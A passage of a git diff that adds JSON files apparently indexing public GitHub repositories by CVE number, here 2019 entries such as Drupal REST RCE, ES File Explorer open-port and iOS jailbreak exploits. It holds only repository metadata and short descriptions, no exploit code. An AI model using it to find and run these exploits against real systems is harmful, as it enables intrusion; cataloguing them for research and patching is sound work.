"watchers": 70, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 254655275, + "name": "cve-2019-6207", + "full_name": "DimitriFourny\/cve-2019-6207", + "owner": { + "login": "DimitriFourny", + "id": 17668518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17668518?v=4", + "html_url": "https:\/\/github.com\/DimitriFourny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimitriFourny\/cve-2019-6207", + "description": "MacOS kernel memory leak (4 bytes)", + "fork": false, + "created_at": "2020-04-10T14:30:16Z", + "updated_at": "2024-08-15T03:57:59Z", + "pushed_at": "2020-04-14T06:57:49Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1day" + ], + "visibility": "public", + "forks": 3, + "watchers": 29, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6225.json b/2019/CVE-2019-6225.json new file mode 100644 index 0000000000..2ad49aded5 --- /dev/null +++ b/2019/CVE-2019-6225.json @@ -0,0 +1,95 @@ +[ + { + "id": 168440280, + "name": "OsirisJailbreak12", + "full_name": "fatgrass\/OsirisJailbreak12", + "owner": { + "login": "fatgrass", + "id": 19977419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19977419?v=4", + "html_url": "https:\/\/github.com\/fatgrass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fatgrass\/OsirisJailbreak12", + "description": "iOS 12.0 -> 12.1.2 Incomplete Osiris Jailbreak with CVE-2019-6225 by GeoSn0w (FCE365)", + "fork": false, + "created_at": "2019-01-31T01:03:43Z", + "updated_at": "2024-08-12T19:45:21Z", + "pushed_at": "2019-01-31T00:53:03Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 68, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 68, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 194542840, + "name": "CVE-2019-6225-macOS", + "full_name": "TrungNguyen1909\/CVE-2019-6225-macOS", + "owner": { + "login": "TrungNguyen1909", + "id": 22745058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22745058?v=4", + "html_url": "https:\/\/github.com\/TrungNguyen1909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TrungNguyen1909\/CVE-2019-6225-macOS", + "description": null, + "fork": false, + "created_at": "2019-06-30T17:26:53Z", + "updated_at": "2020-04-01T13:37:24Z", + "pushed_at": "2019-06-30T17:28:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 201224192, + "name": "jailbreak-iOS12", + "full_name": "raystyle\/jailbreak-iOS12", + "owner": { + "login": "raystyle", + "id": 3284570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3284570?v=4", + "html_url": "https:\/\/github.com\/raystyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raystyle\/jailbreak-iOS12", + "description": "OS 12.0 & 12.1.2 - Jailbreak with CVE-2019-6225", + "fork": false, + "created_at": "2019-08-08T09:22:57Z", + "updated_at": "2023-12-14T09:53:09Z", + "pushed_at": "2019-02-27T12:57:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6249.json b/2019/CVE-2019-6249.json new file mode 100644 index 0000000000..6de78c7a40 --- /dev/null +++ b/2019/CVE-2019-6249.json @@ -0,0 +1,33 @@ +[ + { + "id": 171827364, + "name": "CVE-2019-6249_Hucart-cms", + "full_name": "AlphabugX\/CVE-2019-6249_Hucart-cms", + "owner": { + "login": "AlphabugX", + "id": 27001865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27001865?v=4", + "html_url": "https:\/\/github.com\/AlphabugX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlphabugX\/CVE-2019-6249_Hucart-cms", + "description": "CVE-2019-6249 Hucart cms 复现环境", + "fork": false, + "created_at": "2019-02-21T08:03:43Z", + "updated_at": "2024-08-12T19:46:00Z", + "pushed_at": "2021-11-26T03:17:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6250.json b/2019/CVE-2019-6250.json new file mode 100644 index 0000000000..e7b62d209e --- /dev/null +++ b/2019/CVE-2019-6250.json @@ -0,0 +1,33 @@ +[ + { + "id": 817744684, + "name": "CVE-2019-6250-libzmq", + "full_name": "AkashicYiTai\/CVE-2019-6250-libzmq", + "owner": { + "login": "AkashicYiTai", + "id": 97335989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97335989?v=4", + "html_url": "https:\/\/github.com\/AkashicYiTai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkashicYiTai\/CVE-2019-6250-libzmq", + "description": null, + "fork": false, + "created_at": "2024-06-20T10:56:43Z", + "updated_at": "2024-06-20T10:59:02Z", + "pushed_at": "2024-06-20T10:58:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6260.json b/2019/CVE-2019-6260.json new file mode 100644 index 0000000000..c0f823ef5d --- /dev/null +++ b/2019/CVE-2019-6260.json @@ -0,0 +1,33 @@ +[ + { + "id": 369476141, + "name": "cve-2019-6260", + "full_name": "nikitapbst\/cve-2019-6260", + "owner": { + "login": "nikitapbst", + "id": 76496360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76496360?v=4", + "html_url": "https:\/\/github.com\/nikitapbst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikitapbst\/cve-2019-6260", + "description": null, + "fork": false, + "created_at": "2021-05-21T09:01:05Z", + "updated_at": "2023-10-09T02:04:11Z", + "pushed_at": "2021-05-21T09:02:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6263.json b/2019/CVE-2019-6263.json new file mode 100644 index 0000000000..adf84f5e38 --- /dev/null +++ b/2019/CVE-2019-6263.json @@ -0,0 +1,33 @@ +[ + { + "id": 166368513, + "name": "CVE-2019-6263-Joomla-POC", + "full_name": "praveensutar\/CVE-2019-6263-Joomla-POC", + "owner": { + "login": "praveensutar", + "id": 12555214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12555214?v=4", + "html_url": "https:\/\/github.com\/praveensutar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/praveensutar\/CVE-2019-6263-Joomla-POC", + "description": null, + "fork": false, + "created_at": "2019-01-18T08:10:11Z", + "updated_at": "2023-01-10T03:19:58Z", + "pushed_at": "2019-01-19T04:29:22Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6329.json b/2019/CVE-2019-6329.json new file mode 100644 index 0000000000..bb67e4f1d3 --- /dev/null +++ b/2019/CVE-2019-6329.json @@ -0,0 +1,33 @@ +[ + { + "id": 214792106, + "name": "CVE-2019-6329", + "full_name": "ManhNDd\/CVE-2019-6329", + "owner": { + "login": "ManhNDd", + "id": 18594865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18594865?v=4", + "html_url": "https:\/\/github.com\/ManhNDd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ManhNDd\/CVE-2019-6329", + "description": "Local Privilege Escalation in HP Support Assistant", + "fork": false, + "created_at": "2019-10-13T09:20:16Z", + "updated_at": "2024-03-07T20:01:21Z", + "pushed_at": "2022-05-06T17:33:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6339.json b/2019/CVE-2019-6339.json new file mode 100644 index 0000000000..3df0aacdee --- /dev/null +++ b/2019/CVE-2019-6339.json @@ -0,0 +1,33 @@ +[ + { + "id": 418807056, + "name": "drupal-cve-2019-6339", + "full_name": "Vulnmachines\/drupal-cve-2019-6339", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/drupal-cve-2019-6339", + "description": "Drupal remote code execution vulnerabilty", + "fork": false, + "created_at": "2021-10-19T06:59:29Z", + "updated_at": "2024-08-12T20:17:21Z", + "pushed_at": "2021-10-19T07:00:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6340.json b/2019/CVE-2019-6340.json new file mode 100644 index 0000000000..5661062b0a --- /dev/null +++ b/2019/CVE-2019-6340.json @@ -0,0 +1,312 @@ +[ + { + "id": 172094613, + "name": "Drupal-SA-CORE-2019-003", + "full_name": "g0rx\/Drupal-SA-CORE-2019-003", + "owner": { + "login": "g0rx", + "id": 10961397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10961397?v=4", + "html_url": "https:\/\/github.com\/g0rx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g0rx\/Drupal-SA-CORE-2019-003", + "description": "CVE-2019-6340-Drupal SA-CORE-2019-003", + "fork": false, + "created_at": "2019-02-22T16:03:40Z", + "updated_at": "2024-08-12T19:46:03Z", + "pushed_at": "2019-02-24T18:43:05Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 32, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 172217636, + "name": "CVE-2019-6340", + "full_name": "knqyf263\/CVE-2019-6340", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2019-6340", + "description": "Environment for CVE-2019-6340 (Drupal)", + "fork": false, + "created_at": "2019-02-23T13:28:58Z", + "updated_at": "2024-11-22T12:08:11Z", + "pushed_at": "2023-06-19T03:09:28Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 43, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 172429144, + "name": "CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass", + "full_name": "DevDungeon\/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass", + "owner": { + "login": "DevDungeon", + "id": 16630634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16630634?v=4", + "html_url": "https:\/\/github.com\/DevDungeon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DevDungeon\/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass", + "description": "CVE-2019-6340 Drupal 8.6.9 REST Auth Bypass examples", + "fork": false, + "created_at": "2019-02-25T03:38:47Z", + "updated_at": "2024-08-12T19:46:08Z", + "pushed_at": "2019-02-25T03:47:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 172458734, + "name": "CVE-2019-6340", + "full_name": "oways\/CVE-2019-6340", + "owner": { + "login": "oways", + "id": 11142952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11142952?v=4", + "html_url": "https:\/\/github.com\/oways", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oways\/CVE-2019-6340", + "description": "CVE-2019-6340 POC Drupal rce", + "fork": false, + "created_at": "2019-02-25T07:47:16Z", + "updated_at": "2024-08-12T19:46:08Z", + "pushed_at": "2019-02-25T08:57:14Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 172766416, + "name": "cve-2019-6340", + "full_name": "cved-sources\/cve-2019-6340", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-6340", + "description": "cve-2019-6340", + "fork": false, + "created_at": "2019-02-26T18:26:50Z", + "updated_at": "2024-08-12T19:46:11Z", + "pushed_at": "2021-04-15T22:55:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 175109773, + "name": "cve-2019-6340-bits", + "full_name": "josehelps\/cve-2019-6340-bits", + "owner": { + "login": "josehelps", + "id": 1476868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476868?v=4", + "html_url": "https:\/\/github.com\/josehelps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/josehelps\/cve-2019-6340-bits", + "description": "Bits generated while analyzing CVE-2019-6340 Drupal RESTful RCE", + "fork": false, + "created_at": "2019-03-12T01:13:56Z", + "updated_at": "2019-04-15T07:13:03Z", + "pushed_at": "2019-03-12T01:41:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 188896047, + "name": "CVE-2019-6340", + "full_name": "jas502n\/CVE-2019-6340", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-6340", + "description": "Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340", + "fork": false, + "created_at": "2019-05-27T19:06:14Z", + "updated_at": "2024-09-09T05:45:11Z", + "pushed_at": "2020-06-10T18:03:24Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 70, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 291841926, + "name": "drupal8-REST-RCE", + "full_name": "ludy-dev\/drupal8-REST-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/drupal8-REST-RCE", + "description": "(CVE-2019-6340, CVE-2018-7600) drupal8-REST-RCE ", + "fork": false, + "created_at": "2020-08-31T22:55:18Z", + "updated_at": "2020-11-24T15:41:16Z", + "pushed_at": "2020-11-07T10:06:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 363437024, + "name": "CVE-2019-6340", + "full_name": "nobodyatall648\/CVE-2019-6340", + "owner": { + "login": "nobodyatall648", + "id": 35725871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2019-6340", + "description": "Drupal Drupal 8.6.x RCE Exploit", + "fork": false, + "created_at": "2021-05-01T15:00:34Z", + "updated_at": "2024-03-18T10:45:46Z", + "pushed_at": "2021-05-01T15:00:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604944329, + "name": "Drupal-cve-2019-6340", + "full_name": "Sumitpathania03\/Drupal-cve-2019-6340", + "owner": { + "login": "Sumitpathania03", + "id": 126046383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126046383?v=4", + "html_url": "https:\/\/github.com\/Sumitpathania03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sumitpathania03\/Drupal-cve-2019-6340", + "description": null, + "fork": false, + "created_at": "2023-02-22T05:24:37Z", + "updated_at": "2024-11-26T09:47:58Z", + "pushed_at": "2023-03-21T08:56:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6440.json b/2019/CVE-2019-6440.json new file mode 100644 index 0000000000..5244997bfd --- /dev/null +++ b/2019/CVE-2019-6440.json @@ -0,0 +1,33 @@ +[ + { + "id": 170884262, + "name": "CVE-2019-6440", + "full_name": "hexnone\/CVE-2019-6440", + "owner": { + "login": "hexnone", + "id": 17256467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17256467?v=4", + "html_url": "https:\/\/github.com\/hexnone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hexnone\/CVE-2019-6440", + "description": "CVE-2019-6440. Zemana RCE and privilege escalation.", + "fork": false, + "created_at": "2019-02-15T15:15:52Z", + "updated_at": "2019-03-22T18:53:26Z", + "pushed_at": "2019-03-22T18:53:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6446.json b/2019/CVE-2019-6446.json new file mode 100644 index 0000000000..f9f4c802ea --- /dev/null +++ b/2019/CVE-2019-6446.json @@ -0,0 +1,33 @@ +[ + { + "id": 186728497, + "name": "CVE-2019-6446", + "full_name": "RayScri\/CVE-2019-6446", + "owner": { + "login": "RayScri", + "id": 49472130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49472130?v=4", + "html_url": "https:\/\/github.com\/RayScri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RayScri\/CVE-2019-6446", + "description": "Numpy deserialization command execution", + "fork": false, + "created_at": "2019-05-15T01:39:53Z", + "updated_at": "2024-08-12T19:48:53Z", + "pushed_at": "2019-05-15T02:22:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6447.json b/2019/CVE-2019-6447.json new file mode 100644 index 0000000000..6c386a7743 --- /dev/null +++ b/2019/CVE-2019-6447.json @@ -0,0 +1,410 @@ +[ + { + "id": 164948400, + "name": "ESFileExplorerOpenPortVuln", + "full_name": "fs0c131y\/ESFileExplorerOpenPortVuln", + "owner": { + "login": "fs0c131y", + "id": 36547191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36547191?v=4", + "html_url": "https:\/\/github.com\/fs0c131y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fs0c131y\/ESFileExplorerOpenPortVuln", + "description": "ES File Explorer Open Port Vulnerability - CVE-2019-6447", + "fork": false, + "created_at": "2019-01-09T22:30:42Z", + "updated_at": "2024-11-12T00:23:00Z", + "pushed_at": "2023-09-28T18:58:28Z", + "stargazers_count": 670, + "watchers_count": 670, + "has_discussions": false, + "forks_count": 131, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-6447", + "infosec", + "vulnerability" + ], + "visibility": "public", + "forks": 131, + "watchers": 670, + "score": 0, + "subscribers_count": 43 + }, + { + "id": 263921419, + "name": "ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447", + "full_name": "SandaRuFdo\/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447", + "owner": { + "login": "SandaRuFdo", + "id": 49802268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49802268?v=4", + "html_url": "https:\/\/github.com\/SandaRuFdo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SandaRuFdo\/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447", + "description": "ES File Explorer Open Port Vulnerability - CVE-2019-6447", + "fork": false, + "created_at": "2020-05-14T13:22:54Z", + "updated_at": "2020-05-14T13:23:58Z", + "pushed_at": "2020-05-14T13:23:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 381078333, + "name": "CVE-2019-6447", + "full_name": "Nehal-Zaman\/CVE-2019-6447", + "owner": { + "login": "Nehal-Zaman", + "id": 70776749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70776749?v=4", + "html_url": "https:\/\/github.com\/Nehal-Zaman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nehal-Zaman\/CVE-2019-6447", + "description": "My exploit for ES Explorer Android App open port vulnerability.", + "fork": false, + "created_at": "2021-06-28T15:25:49Z", + "updated_at": "2024-08-12T20:14:18Z", + "pushed_at": "2021-06-28T15:31:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 384531590, + "name": "CVE-2019-6447", + "full_name": "n3rdh4x0r\/CVE-2019-6447", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2019-6447", + "description": null, + "fork": false, + "created_at": "2021-07-09T19:21:29Z", + "updated_at": "2024-11-18T19:14:40Z", + "pushed_at": "2024-11-18T19:14:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 393840722, + "name": "POC-ES-File-Explorer-CVE-2019-6447", + "full_name": "julio-cfa\/POC-ES-File-Explorer-CVE-2019-6447", + "owner": { + "login": "julio-cfa", + "id": 52619625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52619625?v=4", + "html_url": "https:\/\/github.com\/julio-cfa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julio-cfa\/POC-ES-File-Explorer-CVE-2019-6447", + "description": "Very basic bash script to exploit the CVE-2019-6447.", + "fork": false, + "created_at": "2021-08-08T02:54:25Z", + "updated_at": "2021-09-13T11:33:04Z", + "pushed_at": "2021-09-13T11:33:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414617161, + "name": "CVE-2019-6447-ESfile-explorer-exploit", + "full_name": "febinrev\/CVE-2019-6447-ESfile-explorer-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/CVE-2019-6447-ESfile-explorer-exploit", + "description": "ES File Explorer v4.1.9.7.4 Open port vulnerability exploit. CVE-2019-6447 ", + "fork": false, + "created_at": "2021-10-07T13:41:06Z", + "updated_at": "2021-10-18T08:52:35Z", + "pushed_at": "2021-10-18T06:26:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 455045789, + "name": "CVE-2019-6447--.", + "full_name": "Kayky-cmd\/CVE-2019-6447--.", + "owner": { + "login": "Kayky-cmd", + "id": 68632856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68632856?v=4", + "html_url": "https:\/\/github.com\/Kayky-cmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kayky-cmd\/CVE-2019-6447--.", + "description": null, + "fork": false, + "created_at": "2022-02-03T05:50:03Z", + "updated_at": "2024-07-30T22:40:54Z", + "pushed_at": "2024-07-30T22:40:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503628259, + "name": "CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer", + "full_name": "VinuKalana\/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer", + "owner": { + "login": "VinuKalana", + "id": 87648107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87648107?v=4", + "html_url": "https:\/\/github.com\/VinuKalana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VinuKalana\/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer", + "description": "This repository is developed to understand CVE-2019-6447", + "fork": false, + "created_at": "2022-06-15T05:32:34Z", + "updated_at": "2022-06-15T05:32:34Z", + "pushed_at": "2022-06-15T05:34:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 509936375, + "name": "CVE-2019-6447", + "full_name": "Osuni-99\/CVE-2019-6447", + "owner": { + "login": "Osuni-99", + "id": 80031308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80031308?v=4", + "html_url": "https:\/\/github.com\/Osuni-99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osuni-99\/CVE-2019-6447", + "description": "The above investigation of the ES file browser security weakness allows us to see the issue in its entirety", + "fork": false, + "created_at": "2022-07-03T05:57:14Z", + "updated_at": "2022-07-03T05:57:14Z", + "pushed_at": "2022-07-03T05:57:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 511929182, + "name": "EsFileExplorer-CVE-2019-6447", + "full_name": 